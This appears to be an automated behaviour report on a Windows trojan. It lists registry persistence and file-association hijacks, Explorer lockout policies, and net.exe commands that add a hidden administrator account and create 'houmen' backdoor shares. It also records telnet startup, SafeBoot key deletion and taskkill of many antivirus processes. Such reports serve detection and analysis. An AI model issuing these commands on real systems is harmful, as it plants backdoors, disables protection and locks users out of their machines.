Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '<File name>.exe' = '<Full path to file>'
- [<HKLM>\SOFTWARE\Classes\EKY_CLASSES_ROOT\exefile\shell\open\command] '' = '<Full path to file>'
- [<HKLM>\SOFTWARE\Classes\.bat] '' = 'jpegfile'
- [<HKLM>\SOFTWARE\Classes\.exe] '' = 'jpegfile'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run] 'ADSL Dial' = '<Full path to file>'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '№¤ѕЯ.exe' = 'ЎѕУгУҐѕь¶УЎїZHX.exe'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] '№¤ѕЯ.exe' = 'C:\Users\Administrator\Desktop\ЎѕУгУҐѕь¶УЎїZHX.exe'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ОТµДЖф¶ЇПо' = '<Full path to file>'
- [<HKLM>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'ЎѕУгУҐѕь¶УЎїZHX.exe' = '<Full path to file>'
- hidden files
- Command Prompt (CMD)
- Windows Task Manager (Taskmgr)
- Registry Editor (RegEdit)
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoLogOff' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFileMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFind' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoSetFolders' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewContextMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRecentDocsMenu' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoClose' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDrives' = 'FFFFFFFF'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoRun' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoControlPanel' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoDesktop' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoFolderOptions' = '00000001'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer] 'NoViewOnDrive' = 'FFFFFFFF'
- '<SYSTEM32>\net1.exe' user Forbidden /active:yes
- '<SYSTEM32>\net.exe' user Forbidden /active:yes
- '<SYSTEM32>\net1.exe' start Server
- '<SYSTEM32>\net.exe' localgroup Administrators Forbidden /add
- '<SYSTEM32>\net.exe' user Administrator /active:no
- '<SYSTEM32>\net1.exe' localgroup Administrators Forbidden /add
- '<SYSTEM32>\net1.exe' user ЎѕУгУҐѕь¶УЎї 969675 /add
- '<SYSTEM32>\net1.exe' start telnet
- '<SYSTEM32>\net.exe' start telnet
- '<SYSTEM32>\net.exe' share houmen2$=d:\
- '<SYSTEM32>\net.exe' share houmen$=c:\
- '<SYSTEM32>\net1.exe' share houmen2$=d:\
- '<SYSTEM32>\net.exe' user ЎѕУгУҐѕь¶УЎї 969675 /add
- '<SYSTEM32>\net1.exe' share houmen$=c:\
- '<SYSTEM32>\net.exe' start Server
- '<SYSTEM32>\cmd.exe' /k net logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\net.exe' password
- '<SYSTEM32>\net1.exe' user guest 5197
- '<SYSTEM32>\net1.exe' password
- '<SYSTEM32>\net1.exe' logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\reg.exe' DELETE HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\ /va /f
- '<SYSTEM32>\net.exe' logoff -set loadoptions DDISABLE_INTEGRITY_CHECKS
- '<SYSTEM32>\net1.exe' share c$ /del
- '<SYSTEM32>\iexpress.exe'
- '<SYSTEM32>\syskey.exe'
- '<SYSTEM32>\net1.exe' user Administrator /active:no
- '<SYSTEM32>\net.exe' share c$ /del
- '<SYSTEM32>\net.exe' user guest 5197
- '<SYSTEM32>\net1.exe' stop
- '<SYSTEM32>\net.exe' stop
- '<SYSTEM32>\taskkill.exe' /f /im ZhuDongFangYu.exe
- '<SYSTEM32>\charmap.exe'
- '<SYSTEM32>\utilman.exe'
- '<SYSTEM32>\shrpubw.exe'
- '<SYSTEM32>\sndrec32.exe'
- '<SYSTEM32>\packager.exe'
- '<SYSTEM32>\cliconfg.exe'
- '<SYSTEM32>\sigverif.exe'
- '<SYSTEM32>\taskkill.exe' /f /im VsTskMgr.exe
- '<SYSTEM32>\taskkill.exe' /f /im kavsvc.exe
- '<SYSTEM32>\shutdown.exe' -s -t 3600
- '<SYSTEM32>\mstsc.exe' /v: 192.168.1.103:3389 /console
- '<SYSTEM32>\taskkill.exe' /f /im KVXP.kxp
- '<SYSTEM32>\taskkill.exe' /f /im Mcshield.exe
- '<SYSTEM32>\taskkill.exe' /f /im Ravmon.exe
- '<SYSTEM32>\taskkill.exe' /f /im Rav.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360sclog.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360tray.exe
- '<SYSTEM32>\net.exe' stop messenger
- '<SYSTEM32>\net1.exe' stop messenger
- '<SYSTEM32>\taskkill.exe' /f /im 360se.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360sctblist.exe
- '<SYSTEM32>\taskkill.exe' /f /im 360realpro.exe
- '<SYSTEM32>\wscript.exe'
- '<SYSTEM32>\narrator.exe'
- '<SYSTEM32>\netstat.exe' -an ЈЁtcЈ©
- '<SYSTEM32>\netstat.exe' -an
- '<SYSTEM32>\ntbackup.exe'
- '<SYSTEM32>\ddeshare.exe'
- '<SYSTEM32>\mstsc.exe'
- '<SYSTEM32>\nslookup.exe'
- 360tray.exe
- <SYSTEM32>\dllcache\taskmgr.exe.new
- <SYSTEM32>\NtmsData\NTMSDATA
- <SYSTEM32>\taskmgr.exe.new
- %APPDATA%\Microsoft\Speech\Files\UserLexicons\SP_E0EEF5A6305B4FE9893AC119D6043D53.dat
- <SYSTEM32>\NtmsData\NTMSREG
- <SYSTEM32>\NtmsData\NTMSJRNL
- <SYSTEM32>\NtmsData\NTMSIDX
- <SYSTEM32>\NtmsData\NTMSDATA.BAK
- C:\Documents and Settings\<File name>.exe
- <Current directory>\YUYING.bat
- <Current directory>\Fontainebleau.bat
- <Current directory>\Crash.vbs
- <Current directory>\Osprey.bat
- %WINDIR%\<File name>.exe
- %ProgramFiles%\<File name>.exe
- <SYSTEM32>\Eleanor.ico
- <SYSTEM32>\2.bat
- <SYSTEM32>\NtmsData\NTMSJRNL
- <SYSTEM32>\taskmgr.exe
- <SYSTEM32>\NtmsData\NTMSJRNL
- '<L####NET_GATEWAY>':53
- '<L####NET>.1.103':3389
- ClassName: 'NDDEAgnt' WindowName: 'NetDDE Agent'
- ClassName: 'OleMainThreadWndClass' WindowName: ''
- ClassName: 'CicLoaderWndClass' WindowName: ''
- ClassName: 'MSAA_DA_Class' WindowName: 'MSAA_DA_d48'
- ClassName: 'EDIT' WindowName: ''
- ClassName: '' WindowName: 'Windows Script Host Settings'
- ClassName: 'Progman' WindowName: ''
- ClassName: '' WindowName: 'Microsoft Internet Explorer'
- ClassName: 'Shell_TrayWnd' WindowName: ''
- ClassName: '' WindowName: 'File Signature Verification'
- ClassName: '#32770' WindowName: 'Utility Manager'
- ClassName: '' WindowName: ''